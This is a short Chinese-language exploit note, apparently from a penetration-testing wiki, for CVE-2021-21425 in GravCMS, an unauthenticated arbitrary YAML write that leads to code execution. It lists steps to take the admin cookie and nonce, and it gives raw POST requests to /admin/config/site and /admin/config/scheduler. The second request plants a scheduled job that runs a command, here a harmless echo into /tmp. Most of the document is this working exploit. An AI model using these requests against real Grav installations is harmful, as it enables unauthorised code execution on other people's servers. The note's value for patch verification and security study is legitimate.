跳转至

GravCMS未经身份验证的任意YAML写入/RCE(CVE-2021-21425)

详情分析可以见:https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/

任意YAML文件写入:

  • 1 –访问hxxp://target/admin URL.。
  • 2 –获取cookie并从登录表单中提取admin-nonce值。
  • 3-执行以下POST请求。
POST /admin/config/site HTTP/1.1
HOST: target
...

task=SavaDefault&data[title]=PWNED&admin-nonce=xxx

rce:

POST /admin/config/scheduler HTTP/1.1
Host: 192.168.179.131
Content-Length: 348
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.179.131
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.179.131/admin/forgot
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: grav-site-1dfbe94-admin=s2pca2cleqg78u8iit6v593h60
Connection: close
task=SaveDefault&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bcommand%5D=/usr/bin/echo
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bargs%5D=1337
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bat%5D=*+*+*+*+*
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput%5D=/tmp/1.txt
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput_mode%5D=append
&admin-nonce=b78bb0a12604579896f9b4796dde8833

ref:

  • https://nvd.nist.gov/vuln/detail/CVE-2021-21425
  • https://github.com/getgrav/grav-plugin-admin/security/advisories/GHSA-6f53-6qgv-39pj
  • https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/